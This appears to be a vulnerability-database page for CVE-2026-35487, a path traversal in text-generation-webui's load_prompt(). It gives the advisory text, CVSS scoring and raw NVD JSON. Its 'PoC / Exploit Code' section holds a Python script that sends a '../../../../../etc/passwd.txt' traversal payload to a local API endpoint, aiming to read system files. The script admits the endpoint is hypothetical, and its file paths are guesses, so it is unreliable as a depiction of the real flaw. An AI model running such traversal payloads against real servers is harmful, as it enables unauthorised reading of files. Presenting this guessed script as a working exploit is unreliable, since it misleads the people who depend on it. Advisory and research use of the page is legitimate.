Security Vulnerability Report
中文
CVE-2026-35487 CVSS 5.3 MEDIUM

CVE-2026-35487

Published: 2026-04-07 16:16:27
Last Modified: 2026-04-09 18:46:12
Source: [email protected]

Description

text-generation-webui is an open-source web interface for running Large Language Models. Prior to 4.3, an unauthenticated path traversal vulnerability in load_prompt() allows reading any .txt file on the server filesystem. The file content is returned verbatim in the API response. This vulnerability is fixed in 4.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oobabooga:text_generation_web_ui:*:*:*:*:*:*:*:* - VULNERABLE
text-generation-webui < 4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: CVE-2026-35487 text-generation-webui Path Traversal PoC # Description: Unauthenticated path traversal allows reading any .txt file via load_prompt() # Target configuration target_host = "http://127.0.0.1:5000" # The vulnerability exists in the load_prompt functionality. # Attackers can traverse directories using '../' sequences. # Note: The vulnerability description specifies it reads any .txt file. malicious_payload = { # Attempting to read a sensitive file (e.g., config.txt located in parent directories) "prompt_file": "../../../../../etc/passwd.txt" # If the system reads /etc/passwd (without .txt), try targeting a known .txt file location. # Example: "../../../../../windows/win.ini" if the app appends .txt automatically. } print(f"[*] Attempting to exploit {target_host}...") try: # Sending the request to the hypothetical endpoint response = requests.post(f"{target_host}/api/v1/load-prompt", data=malicious_payload, timeout=10) if response.status_code == 200: print("[+] Request successful! Check response content below:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35487", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:26.853", "lastModified": "2026-04-09T18:46:11.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "text-generation-webui is an open-source web interface for running Large Language Models. Prior to 4.3, an unauthenticated path traversal vulnerability in load_prompt() allows reading any .txt file on the server filesystem. The file content is returned verbatim in the API response. This vulnerability is fixed in 4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oobabooga:text_generation_web_ui:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3", "matchCriteriaId": "7B0114B9-7FD7-45A2-9103-936373FF3445"}]}]}], "references": [{"url": "https://github.com/oobabooga/text-generation-webui/security/advisories/GHSA-mfgg-vvc6-vqq7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.